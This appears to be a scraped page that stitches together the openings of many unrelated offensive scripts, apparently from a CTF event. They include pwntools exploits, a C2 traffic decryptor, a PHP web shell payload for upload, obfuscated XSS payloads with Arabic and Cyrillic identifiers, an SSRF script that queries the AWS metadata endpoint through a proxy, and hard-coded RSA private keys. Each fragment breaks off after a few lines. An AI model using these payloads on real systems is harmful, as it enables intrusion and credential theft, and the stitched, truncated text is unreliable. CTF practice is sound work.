| #!/usr/bin/env python3 | |
| """ | |
| pcap_flag_solver.py | |
| ------------------- | |
| Extracts and decrypts AES/HMAC-protected C2 messages from a PCAP/PCAPNG and prints any CTF-like flags found. | |
| Assumptions (derived from embedded PowerShell in the PCAP): | |
| - $sharedHex is present in the capture and provides key material (32 bytes as hex). | |
| - AES-128-CBC for confidentiality. | |
| - HMAC-SHA256 over (IV || CT) for integrity. |
| #!/usr/bin/env python3 | |
| from pwn import * | |
| import sys | |
| context.arch = "amd64" | |
| context.log_level = "info" | |
| HOST = args.HOST or "teletype.serv1.cbd2025.cloud" | |
| PORT = int(args.PORT or 443) |
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.arch = "amd64" | |
| context.log_level = "INFO" | |
| HOST = "starting-point.serv1.cbd2025.cloud" | |
| PORT = 443 | |
| BIN = "./starting-point" |
| #!/usr/bin/env python3 | |
| # ultra-min: hardcoded target, only --cmd, 1 poller thread | |
| import argparse, io, time, threading, random, string | |
| import requests | |
| from urllib.parse import quote | |
| BASE = "https://racing.serv2.cbd2025.cloud" # hardcoded | |
| PHP_SHELL = b"<?php if(isset($_GET['x'])){system($_GET['x']);} ?>" | |
| def rand_name(): |
XSS Payload Written In Arabic
ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا],
د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+ج+ح+ب[خ]+ذ+ج+ث[ا]+ح][ذ](ت[ا]+ت[خ]+ب[د]+ح+ج+"(1)")()
XSS Payload Written in Russian 🇷🇺
а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('взломано')")()
| from pyngrok import ngrok | |
| from flask import Flask, request | |
| from urllib.parse import urljoin | |
| from PIL import Image, PngImagePlugin | |
| from bs4 import BeautifulSoup | |
| import threading | |
| import requests | |
| import urllib3 | |
| import io | |
| import time |
| #!/usr/bin/env python3 | |
| """ | |
| Task Explorer | |
| Focuses on exploring the specific running task we discovered | |
| """ | |
| import boto3 | |
| import json | |
| import requests | |
| from botocore.exceptions import ClientError |
| import httpx | |
| import json | |
| from datetime import datetime | |
| client = httpx.Client() | |
| base_url = "http://54.251.250.184:5000/proxy" | |
| metadata_url = "http://169.254.169.254" | |
| # Get metadata token | |
| token_url = f"{base_url}?url={metadata_url}/latest/api/token&method=PUT" |
| from base64 import b64decode | |
| from Crypto.PublicKey import RSA | |
| from Crypto.Cipher import PKCS1_v1_5 | |
| privkey = """-----BEGIN RSA PRIVATE KEY----- | |
| MIICWwIBAAKBgQCr3n0mG3OicxP+WJobKvd5RR2/gygPUdZbqYFPYBv2huhjPqte | |
| 5AsTRKOoOzYHJmEJTomx/QYicNgUMLY4xLcERyub/QA2bcPn5UqbwFxWMyo6xkaH | |
| iz3qsHs9MGyBAIq82kTzLng81lnr0ZK/jmLhRupuvtEGV1n593RzbyKbcQIDAQAB | |
| AoGADKdHvXt96vLgAPTS+7cRGzuMciIc2+vhhUQYghiIVoEeMNhXU5gkfJmsFuGt | |
| G5+mu0Gt/42qWvTF486mS82nz6hUrXfJaj+iCs3lbWxiH3nZ3BN1w8SVQww6P0qe |
| import base64 | |
| import glob | |
| import os | |
| from Crypto.PublicKey import RSA | |
| from Crypto.Cipher import PKCS1_v1_5, AES | |
| # --- KONFIGURASI DARI ANALISIS --- | |
| # Kunci privat RSA | |
| RSA_PRIVATE_KEY_PEM = """-----BEGIN RSA PRIVATE KEY----- |